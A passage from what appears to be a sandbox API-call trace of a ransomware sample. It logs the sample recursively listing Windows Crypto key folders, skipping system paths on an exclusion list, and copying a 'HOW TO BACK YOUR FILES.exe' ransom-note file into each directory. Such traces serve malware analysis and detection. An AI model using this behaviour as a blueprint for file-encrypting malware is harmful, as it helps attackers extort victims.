nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.635] CloseHandle (hObject=0x120) returned 1 [0089.635] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.635] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.635] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c84ada0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c84ada0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.635] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.635] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.635] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.635] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c84ada0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c84ada0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.635] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.635] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.635] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.635] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.635] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c897060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c897060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DSS", cAlternateFileName="")) returned 1 [0089.635] lstrcmpiW (lpString1="DSS", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.635] lstrcmpiW (lpString1="DSS", lpString2="aoldtz.exe") returned 1 [0089.635] lstrcmpiW (lpString1="DSS", lpString2=".") returned 1 [0089.635] lstrcmpiW (lpString1="DSS", lpString2="..") returned 1 [0089.635] lstrcmpiW (lpString1="DSS", lpString2="windows") returned -1 [0089.636] lstrcmpiW (lpString1="DSS", lpString2="bootmgr") returned 1 [0089.636] lstrcmpiW (lpString1="DSS", lpString2="temp") returned -1 [0089.636] lstrcmpiW (lpString1="DSS", lpString2="pagefile.sys") returned -1 [0089.636] lstrcmpiW (lpString1="DSS", lpString2="boot") returned 1 [0089.636] lstrcmpiW (lpString1="DSS", lpString2="ids.txt") returned -1 [0089.636] lstrcmpiW (lpString1="DSS", lpString2="ntuser.dat") returned -1 [0089.636] lstrcmpiW (lpString1="DSS", lpString2="perflogs") returned -1 [0089.636] lstrcmpiW (lpString1="DSS", lpString2="MSBuild") returned -1 [0089.636] lstrlenW (lpString="DSS") returned 3 [0089.636] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\*") returned 37 [0089.636] lstrcpyW (in: lpString1=0x2cce448, lpString2="DSS" | out: lpString1="DSS") returned="DSS" [0089.636] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0089.636] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x50) returned 0x2ed798 [0089.636] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0089.636] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c84ada0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c84ada0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.636] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.636] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c870f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Keys", cAlternateFileName="")) returned 1 [0089.636] lstrcmpiW (lpString1="Keys", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.636] lstrcmpiW (lpString1="Keys", lpString2="aoldtz.exe") returned 1 [0089.636] lstrcmpiW (lpString1="Keys", lpString2=".") returned 1 [0089.636] lstrcmpiW (lpString1="Keys", lpString2="..") returned 1 [0089.636] lstrcmpiW (lpString1="Keys", lpString2="windows") returned -1 [0089.636] lstrcmpiW (lpString1="Keys", lpString2="bootmgr") returned 1 [0089.636] lstrcmpiW (lpString1="Keys", lpString2="temp") returned -1 [0089.636] lstrcmpiW (lpString1="Keys", lpString2="pagefile.sys") returned -1 [0089.636] lstrcmpiW (lpString1="Keys", lpString2="boot") returned 1 [0089.636] lstrcmpiW (lpString1="Keys", lpString2="ids.txt") returned 1 [0089.636] lstrcmpiW (lpString1="Keys", lpString2="ntuser.dat") returned -1 [0089.636] lstrcmpiW (lpString1="Keys", lpString2="perflogs") returned -1 [0089.636] lstrcmpiW (lpString1="Keys", lpString2="MSBuild") returned -1 [0089.636] lstrlenW (lpString="Keys") returned 4 [0089.636] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS") returned 39 [0089.636] lstrcpyW (in: lpString1=0x2cce448, lpString2="Keys" | out: lpString1="Keys") returned="Keys" [0089.636] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0089.636] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x52) returned 0x2df710 [0089.636] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0089.636] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c870f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1 [0089.637] lstrcmpiW (lpString1="RSA", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.637] lstrcmpiW (lpString1="RSA", lpString2="aoldtz.exe") returned 1 [0089.637] lstrcmpiW (lpString1="RSA", lpString2=".") returned 1 [0089.637] lstrcmpiW (lpString1="RSA", lpString2="..") returned 1 [0089.637] lstrcmpiW (lpString1="RSA", lpString2="windows") returned -1 [0089.637] lstrcmpiW (lpString1="RSA", lpString2="bootmgr") returned 1 [0089.637] lstrcmpiW (lpString1="RSA", lpString2="temp") returned -1 [0089.637] lstrcmpiW (lpString1="RSA", lpString2="pagefile.sys") returned 1 [0089.637] lstrcmpiW (lpString1="RSA", lpString2="boot") returned 1 [0089.637] lstrcmpiW (lpString1="RSA", lpString2="ids.txt") returned 1 [0089.637] lstrcmpiW (lpString1="RSA", lpString2="ntuser.dat") returned 1 [0089.637] lstrcmpiW (lpString1="RSA", lpString2="perflogs") returned 1 [0089.637] lstrcmpiW (lpString1="RSA", lpString2="MSBuild") returned 1 [0089.637] lstrlenW (lpString="RSA") returned 3 [0089.637] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys") returned 40 [0089.637] lstrcpyW (in: lpString1=0x2cce448, lpString2="RSA" | out: lpString1="RSA") returned="RSA" [0089.637] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0089.637] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x50) returned 0x2ed8a0 [0089.637] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0089.637] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c870f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 0 [0089.637] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.637] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b50 [0089.637] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA" [0089.637] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed8a0 | out: hHeap=0x2b0000) returned 1 [0089.637] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0089.637] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA") returned 39 [0089.637] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA" [0089.637] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.637] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.638] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.638] GetLastError () returned 0x0 [0089.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.638] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.638] CloseHandle (hObject=0x120) returned 1 [0089.638] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.638] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.638] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c870f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.638] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.638] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.638] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.639] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c870f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.639] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.639] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.639] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.639] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.639] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c870f00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.639] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.639] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c870f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0089.639] lstrcmpiW (lpString1="MachineKeys", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.639] lstrcmpiW (lpString1="MachineKeys", lpString2="aoldtz.exe") returned 1 [0089.639] lstrcmpiW (lpString1="MachineKeys", lpString2=".") returned 1 [0089.639] lstrcmpiW (lpString1="MachineKeys", lpString2="..") returned 1 [0089.639] lstrcmpiW (lpString1="MachineKeys", lpString2="windows") returned -1 [0089.639] lstrcmpiW (lpString1="MachineKeys", lpString2="bootmgr") returned 1 [0089.639] lstrcmpiW (lpString1="MachineKeys", lpString2="temp") returned -1 [0089.639] lstrcmpiW (lpString1="MachineKeys", lpString2="pagefile.sys") returned -1 [0089.639] lstrcmpiW (lpString1="MachineKeys", lpString2="boot") returned 1 [0089.639] lstrcmpiW (lpString1="MachineKeys", lpString2="ids.txt") returned 1 [0089.639] lstrcmpiW (lpString1="MachineKeys", lpString2="ntuser.dat") returned -1 [0089.639] lstrcmpiW (lpString1="MachineKeys", lpString2="perflogs") returned -1 [0089.639] lstrcmpiW (lpString1="MachineKeys", lpString2="MSBuild") returned -1 [0089.639] lstrlenW (lpString="MachineKeys") returned 11 [0089.639] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*") returned 41 [0089.639] lstrcpyW (in: lpString1=0x2cce450, lpString2="MachineKeys" | out: lpString1="MachineKeys") returned="MachineKeys" [0089.639] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0089.639] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x68) returned 0x2e4710 [0089.639] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0089.639] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfc65d150, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c870f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0089.639] lstrcmpiW (lpString1="S-1-5-18", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.639] lstrcmpiW (lpString1="S-1-5-18", lpString2="aoldtz.exe") returned 1 [0089.639] lstrcmpiW (lpString1="S-1-5-18", lpString2=".") returned 1 [0089.639] lstrcmpiW (lpString1="S-1-5-18", lpString2="..") returned 1 [0089.639] lstrcmpiW (lpString1="S-1-5-18", lpString2="windows") returned -1 [0089.639] lstrcmpiW (lpString1="S-1-5-18", lpString2="bootmgr") returned 1 [0089.639] lstrcmpiW (lpString1="S-1-5-18", lpString2="temp") returned -1 [0089.639] lstrcmpiW (lpString1="S-1-5-18", lpString2="pagefile.sys") returned 1 [0089.640] lstrcmpiW (lpString1="S-1-5-18", lpString2="boot") returned 1 [0089.640] lstrcmpiW (lpString1="S-1-5-18", lpString2="ids.txt") returned 1 [0089.640] lstrcmpiW (lpString1="S-1-5-18", lpString2="ntuser.dat") returned 1 [0089.640] lstrcmpiW (lpString1="S-1-5-18", lpString2="perflogs") returned 1 [0089.640] lstrcmpiW (lpString1="S-1-5-18", lpString2="MSBuild") returned 1 [0089.640] lstrlenW (lpString="S-1-5-18") returned 8 [0089.640] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys") returned 51 [0089.640] lstrcpyW (in: lpString1=0x2cce450, lpString2="S-1-5-18" | out: lpString1="S-1-5-18") returned="S-1-5-18" [0089.640] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0089.640] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x62) returned 0x2e4780 [0089.640] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0089.640] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfc65d150, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c870f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S-1-5-18", cAlternateFileName="")) returned 0 [0089.640] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.640] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0089.640] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18" [0089.640] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4780 | out: hHeap=0x2b0000) returned 1 [0089.640] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0089.640] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned 48 [0089.640] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18" [0089.640] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.640] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.641] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.641] GetLastError () returned 0x0 [0089.641] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.641] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.641] CloseHandle (hObject=0x120) returned 1 [0089.641] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.641] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.641] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfc65d150, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c870f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.641] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.641] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.641] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.641] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfc65d150, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c870f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.641] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.641] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.641] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.641] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.641] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xfc767af0, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xfc767af0, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xfc767af0, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x2f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", cAlternateFileName="6D14E4~1")) returned 1 [0089.641] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.642] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="aoldtz.exe") returned -1 [0089.642] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2=".") returned 1 [0089.642] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="..") returned 1 [0089.642] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="windows") returned -1 [0089.642] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="bootmgr") returned -1 [0089.642] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="temp") returned -1 [0089.642] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="pagefile.sys") returned -1 [0089.642] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="boot") returned -1 [0089.642] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="ids.txt") returned -1 [0089.642] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="ntuser.dat") returned -1 [0089.642] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="perflogs") returned -1 [0089.642] lstrcmpiW 